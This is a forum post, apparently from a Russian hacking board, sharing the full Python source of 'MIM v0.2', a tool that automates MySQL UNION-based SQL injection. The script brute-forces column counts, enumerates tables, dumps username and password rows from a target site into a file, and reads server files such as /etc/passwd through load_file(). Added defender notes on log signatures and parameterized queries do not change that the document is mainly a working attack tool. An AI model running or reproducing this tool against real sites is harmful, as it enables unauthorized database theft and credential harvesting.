
MIM v0.2 MySQL injection Master

Schtirliz

MIM v0.2 MySQL injection Master

Консольный помощник со SQL.
Версия 0.2
* Подбирает кол-во колонок .
* Узнает какие из них отображаются .
* Выводит USER(), DATABASE(), VERSION().
* Выводит список таблиц .
* Mysql char().
* Считывание файла с сервера с помощью load_file().
* Слитие листов (user;pass) & etc.
* Кое-что добавлено.
Собсно сорец на python (www.python.org)
[New$paN]

 
MAXNM Если кодес тебе интересен то вот он:

Код:
#!/usr/bin/env python
# MIM v 0.2.Sql-inj helper.
# By xN. 2008 .ICQ 667888.
#--------------go--------------#
import sys,urllib2,string,urllib
#--------------prms--------------#
# URL-encoded single quote; brute() appends it to the URL and hands the
# response to checkER().
ff01="%27"
# Marker cell repeated in the UNION SELECT probes; the character codes spell
# ">>>MMTEST<<<".
# NOTE(review): this exact CHAR(...) sequence in a request line is a stable
# indicator of this script in web-server and WAF logs.
ff02=["CHAR(62,62,62,77,77,84,69,83,84,60,60,60)"]#>>>MMTEST<<<
# Response substrings the script searches for. They only match when the target
# application echoes raw MySQL error text to the client; suppressing verbose
# database errors removes that feedback, but only parameterized queries remove
# the underlying injection.
# ff04 is a substring of ff03, so ff03 has to be tested first (see checkER).
ff03="Query failed : You have an error in your SQL syntax"# error text with the "Query failed : " prefix
ff04="You have an error in your SQL syntax"# the same MySQL message without the prefix
ff05="Query failed : Unknown column"# tested by minfo()
ver="0.2"# version string shown in the startup banner
#--------------func--------------#
def o(t):
    """Print *t* as a neutral status line, prefixed with ``[o]``."""
    line="[o]%s"%t
    print line
def p(t):
    """Print *t* as a success line, prefixed with ``[+]``."""
    line="[+]%s"%t
    print line
def m(t):
    """Print *t* as a failure line, prefixed with ``[-]``."""
    line="[-]%s"%t
    print line
def h(t):
    """Print *t* as a help line, prefixed with ``[?]``."""
    line="[?]%s"%t
    print line
def help():
    """Print the command summary, one ``[?]`` line per entry.

    NOTE(review): the name shadows the ``help`` builtin inside this module.
    """
    entries=(
        "Commands:",
        "brute [http://targer.com/script.php?id=]- brute col numz.",
        "dt [http://targer.com/script.php?id=] - Check DB info, do3n tables. ",
        "gl [http://target.com/script.php?id=] - take list from table(user;pass) into file.",
        "lf [http://target.com/script.php?id=] - Try 2 l0ad a file.. ",
        "char [text] - Mysql char",
        "h - help.",
        "q -quit.",
    )
    for entry in entries:
        h(entry)
def checkER(t):
    """Report which of the known MySQL error texts appears in response body *t*.

    Prints one status line and returns None. The check depends entirely on the
    application sending database error text back to the client.
    """
    # ff03 is tested first because ff04 is a substring of it.
    if ff03 in t:
        p("Yes.We have Error :-).")
        return
    if ff04 in t:
        o("We have syntax error..")
        return
    m("No MySQL error:-/")
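def char(t):
    """Return *t* written as a MySQL ``CHAR(...)`` call of decimal character codes.

    ``char("ab")`` returns ``"CHAR(97,98)"``; an empty string returns
    ``"CHAR()"``. The script passes separators and file paths through this
    function before placing them in a query, so those values reach the server
    without any quote characters around them.

    Defender note: input filters that only look for quote characters do not
    see string values written this way; parameterized queries are the fix,
    not quote filtering.
    """
    # Walk the characters directly rather than indexing through range(len(t)).
    codes=",".join(str(ord(ch)) for ch in t)
    return "CHAR(%s)"%codes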
def tinfo(fu,aff,cws,t):
        """Request one SQL expression through a UNION SELECT and split the reply.

        fu  -- SQL expression text placed in the displayed column (callers in
               this file pass "version()", "database()", "user()" and a
               load_file(...) call).
        aff -- list of column expressions; it is MODIFIED in place at index
               int(cws)-1, so the caller's list keeps the last expression.
        cws -- 1-based number of the column whose value the page displays.
        t   -- URL prefix; "1+union+select+<columns>" is appended to it.

        Returns the response body split on "XXcW". CHAR(88,88,99,87) spells
        "XXcW", so when the wrapped value is echoed, element [1] is the value.
        No error handling here: urlopen() failures propagate to the caller.

        Defender note: "union+select" together with CHAR(88,88,99,87) in a
        query string is a log signature for requests built by this function.
        """
        # Wrap the expression between two "XXcW" delimiters.
        aff[int(cws)-1]="concat(CHAR(88,88,99,87),%s,CHAR(88,88,99,87))"%fu
        u="%s1+union+select+%s"%(t,",".join(aff))
        #o(u)
        r=urllib2.urlopen(u)
        data=r.read()
        
        result=data.split("XXcW")

        return result
def minfo(fu,aff,cws,t,fr,wh,i,sep):
        """Request several columns of one table row and return them as one string.

        fu  -- list of column names to read.
        aff -- list of column expressions; MODIFIED in place at index int(cws)-1.
        cws -- 1-based number of the column whose value the page displays.
        t   -- URL prefix the UNION SELECT is appended to.
        fr  -- table name used after "from".
        wh  -- column name for the "where" clause, or '' for no clause.
        i   -- value compared against *wh* (ignored when wh is '').
        sep -- separator text placed between the column values.

        Returns the text found between the two "XXcW" delimiters, or '' when
        the delimiters are missing or the response contains ff05.
        The request URL is printed with o() before it is sent.
        """
        # Operator precedence: .join(fu) is applied to the ",CHAR(..)," string
        # first, and only then is the joined text substituted into the concat()
        # template.
        aff[int(cws)-1]=("concat(CHAR(88,88,99,87),%s,CHAR(88,88,99,87))")%(",%s,"%char(sep)).join(fu) # build the query cell
        if wh<>'':
            u="%s1+union+select+%s+from+%s+where+%s=%s"%(t,",".join(aff),fr,wh,i)
        else:
            u="%s1+union+select+%s+from+%s"%(t,",".join(aff),fr)
            
        o(u)
        r=urllib2.urlopen(u)
        data=r.read()
        result=data.split("XXcW")
        #o(len(result))
        # The "Unknown column" text is only visible when the application
        # returns database error messages to the client.
        if ff05 in data:
                m("Unkown column finded")
                return ''
        else:
            # A split result of length 1 means the delimiter never appeared.
            if len(result)<>1:
                return result[1]
            else:
                return ''
def tt(tabl,aff,cws,t):
        """Request one table name from INFORMATION_SCHEMA.TABLES.

        tabl -- row offset used in "LIMIT <tabl>,1".
        aff  -- list of column expressions; MODIFIED in place at index int(cws)-1.
        cws  -- 1-based number of the column whose value the page displays.
        t    -- URL prefix the UNION SELECT is appended to.

        Returns the response body split on "XXcW"; element [1], when present,
        is the text between the delimiters.

        Defender note: repeated requests naming INFORMATION_SCHEMA.TABLES with
        an increasing LIMIT offset are a recognisable enumeration pattern in
        access logs.
        """
        aff[int(cws)-1]="concat(CHAR(88,88,99,87),table_name,CHAR(88,88,99,87))"
        u="%s1+union+select+%s+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+%s,1"%(t,",".join(aff),tabl)
        r=urllib2.urlopen(u)
        data=r.read()
        result=data.split("XXcW")
        return result
def podgotovit(kol):
    """Return *kol* numbered marker cells joined by commas.

    Each cell is ``concat(<marker>,<index>)`` with a 0-based index, so every
    column position in the response can be told apart.
    """
    cells=ff02*kol
    idx=0
    while idx<kol:
        cells[idx]="concat(%s,%s)"%(cells[idx],idx)
        idx+=1
    return ",".join(cells)
def brute(t):
    """Probe URL prefix *t* for the column count and the displayed columns.

    Steps, each a separate HTTP request:
      1. open *t* unchanged;
      2. open *t* + ff01 and pass the body to checkER();
      3. for i = 1 .. MAX-1, request a UNION SELECT with i marker cells and
         stop at the first response containing ">>>MMTEST<<<";
      4. request numbered marker cells and print which numbers show up.

    Prints its findings and returns None. Every exception is swallowed by the
    outer bare ``except`` and reported only as "BAD.".

    Defender note: step 3 produces a run of near-identical requests whose
    "union+select" list grows by one cell each time, which is easy to spot
    and to rate-limit.
    """
    u=t
    MAX=100 # upper bound on the number of columns tried
    try:
        o("Testing url..")
        r=urllib2.urlopen(u)
        p("Okay.let's Check Mysql error..")
        u=("%s%s")%(t,ff01)
        r=urllib2.urlopen(u)
        checkER(r.read())
        o("Now brute..")
        for i in xrange(1,MAX):
            u=(("%s1+union+select+%s")%(t,",".join(ff02*i)))
            r=urllib2.urlopen(u)
            if ">>>MMTEST<<<" in r.read():
                o("columns=%s"%i)
                tot=i
                break # stop at the first matching column count
            else:
                pass
        o("What we see?..")
        # NOTE(review): tot is assigned only inside the loop above. When no
        # response contained the marker, the next line raises NameError, which
        # the outer bare except turns into "BAD.".
        zzz=podgotovit(tot)
        u=(("%s1+union+select+%s")%(t,zzz))
        r=urllib2.urlopen(u)
        p("Url opened..")
        col=''
        ab=r.read()
        for i in xrange(tot):

            if (ab.find(">>>MMTEST<<<%s"%i)<>-1):
                # Convert the 0-based marker index to a 1-based column number
                # for display; the loop variable is reset on the next pass.
                i+=1
                p("We see column:%s"%(i))
                col="%s %s"%(col,i)
            else:
                pass


        p("Work completed.Columns we see:%s."%col)
    except:
        # Bare except: network errors, NameError and Ctrl-C all end up here.
        m("BAD.")
def dt(t):
    """Print version(), database(), user() and a table list for URL prefix *t*.

    Asks interactively for the column count and for the 1-based number of a
    displayed column, then issues one tinfo() request per value and up to
    MAXT-1 tt() requests for table names. Returns None; all output is printed.

    Defender note: the table listing reads INFORMATION_SCHEMA.TABLES with the
    web application's own database account.
    """
    try:
        o("Testing url..")
        r=urllib2.urlopen(t)
        p("Ok.")
        # NOTE(review): Python 2 input() evaluates whatever is typed as a
        # Python expression; int(raw_input(...)) would read the number without
        # evaluating it.
        c=input("[>]Columns(28):")
        cws=raw_input("[>]One Column we see(22):")
        # One "null" per column; tinfo()/tt() overwrite slot cws-1 in place.
        aff=["null"]*c
        try:
            version=tinfo("version()",aff,cws,t)
            p("ver:%s"%version[1])
        except:
            m("problems with version()")
        try:
            db=tinfo("database()",aff,cws,t)
            p("DB:%s"%db[1])
        except:
            m("Problems with database()")
        try:
            us=tinfo("user()",aff,cws,t)
            p("user:%s"%us[1])
        except:
            m("Problems with user()")
        o("Now tables list..")
        MAXT=150              # upper bound on table requests; can be changed
        for i in xrange(1,MAXT):# i is passed to tt() as the LIMIT offset
            try:
                a777=tt(i,aff,cws,t)
                # Stop at the first empty name between the delimiters.
                if a777[1]<>'':
                   o(("%s)%s")%(i,a777[1]))
                else :
                    break
            except:
                # Any failure (including a reply without delimiters) is
                # ignored and the loop moves on to the next offset.
                pass
        
    except:
        m("BAD.")
def gl(t):
    """Copy selected columns of a table into a local file, one row per request.

    Prompts for: column count, column names (space separated), the displayed
    column number, a separator, an id range, a "where" column, the table name
    and an output file path. Each non-empty minfo() result is appended to the
    file as one line. Returns None; progress is printed.

    With a "where" column the ids run over xrange(from, to), so the upper
    bound itself is not requested. Without one, a single request is made.

    NOTE(review): the output file is opened in append mode and is never closed
    in this function.
    """
    try:
        o("Testing url..")
        r=urllib2.urlopen(t)
        p("Ok.")
        # NOTE(review): Python 2 input() evaluates the typed text as a Python
        # expression; int(raw_input(...)) would avoid that.
        c=input("[>]Columns(28):")
        ta=raw_input("[>]What u want to get 1[whitespace]2..(username password date):")
        cws=raw_input("[>]Column we see(22):")
        sep=raw_input("[>]Separator(; , - ,etc.):")
        ft=raw_input("[>]From[whitespace]to(1 1000)('' if u dont want use where):")
        wh=raw_input("[>]Where?(id)(''=without where):")
        tabl=raw_input("[>]From table(users):" )
        try:
            ftw=raw_input("[>]Output file:")
            # The name ftw is reused: first the path, then the file object.
            ftw=open(ftw,"a")
            ftw.write("#Created with MIM by xN.\n")
            flag=1
        except:
            m("BAD file.")
            flag=0
        if flag==1:
            aff=["null"]*c
            ta=ta.split()
            ft=ft.split()
            a=0 # number of rows written
            if wh<>'':
                for i in xrange(int(ft[0]),int(ft[1])):
                    try:
                        a666=minfo(ta,aff,cws,t,tabl,wh,i,sep)
                        if a666<>'':
                            ftw.write("%s\n"%a666)
                            o("%s - ok."%i)
                            a+=1
                        else:
                            m("%s - bad."%i)
                    except:
                        # Errors for a single id are dropped silently.
                        pass
            else:
                    try:
                        a666=minfo(ta,aff,cws,t,tabl,'',0,sep)
                        if a666<>'':
                            ftw.write("%s\n"%a666)
                            o("ok.")
                            a+=1
                        else:
                            m("bad.")
                    except:
                        pass
                
            p("Okay total:%s"%a)
        else:
            pass
        
    except:
        m("BAD.")
def lf(t):
    """Request a server-side file through load_file() and append it to a local file.

    Prompts for the column count, the displayed column number, the remote path
    and a local output path. The remote path is passed through char() and
    wrapped in load_file(...), then sent with tinfo(). Returns None.

    Defender note: MySQL LOAD_FILE() needs the FILE privilege and is limited
    by the server's secure_file_priv setting; a web application's database
    account should not hold FILE at all.
    """
    try:
        fla=1
        o("Testing url..")
        r=urllib2.urlopen(t)
        p("Ok.")
        # NOTE(review): Python 2 input() evaluates the typed text as a Python
        # expression; int(raw_input(...)) would avoid that.
        c=input("[>]Columns(28):")
        cws=raw_input("[>]Column we see(22):")
        ftg=raw_input("[>]file to get(/etc/passwd):")
        otf=raw_input("[>]In?(/home/user/evil):")
        aff=["null"]*c
        try:
            # Append mode; the file object is never closed in this function.
            fww=open(otf,'a')
            fww.write("#Created with MIM by xN.\n" )
        except:
            fla=0
            m("BAD file.")
        if fla <>0:
            lof=tinfo(("load_file(%s)"%char(ftg)),aff,cws,t)
            p("complete!")
            # More than one piece means the "XXcW" delimiter was echoed back.
            if len(lof)>1 :
                
                o("Saving..")
                fww.write(lof[1])
            else:
                m("No file on server ,or load_file doesnot work=/.")
            o("Work complete!:)")
        else:
            pass
    except:
        m("BAD.")
#--------------main--------------#
# Startup banner and command summary, then an endless read-dispatch loop.
o("Hello !Im Mysql-injectinon master.V[%s].By xN[ef] "%ver)
help() # show the command summary
o("------------------------------------------------------")
while 1:
    # Read one command line and split it on single spaces:
    # c[0] is the command, c[1] the URL prefix (or the text for "char").
    c=raw_input("[>]")
    c=c.split(" ")
    if c[0] =="q":
        # o() returns None, so the process exits with status 0.
        sys.exit(o("bye!"))
    elif c[0] == "h":
        help()
    elif c[0] == "brute":
        # The bare except in each branch reports every failure, including a
        # missing argument (IndexError on c[1]), as "No url.".
        try:
            brute(c[1])
        except:
            m("No url.")
    elif c[0] == "dt":
        try:
            dt(c[1])
        except:
            m("No url.")
    elif c[0] == "gl":
        try:
            gl(c[1])
        except:
            m("No url.")
    elif c[0] == "lf":
        try:
            lf(c[1])
        except:
            m("No url.")
    elif c[0] == "char":
        try:
            # Re-join the remaining words so text containing spaces is kept.
            o(char(" ".join(c[1:])))
        except:
            m("BAD.")
    else:
        o("bad cmd!")
#--------------END----------xN.-#
 

